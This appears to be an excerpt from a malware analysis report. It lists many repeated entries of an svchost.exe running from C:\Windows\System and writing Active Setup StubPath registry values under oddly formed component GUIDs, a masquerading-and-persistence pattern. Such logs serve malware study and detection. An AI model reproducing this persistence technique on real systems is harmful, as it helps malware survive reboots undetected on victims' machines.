Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
Source: C:\Windows\System\svchost.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
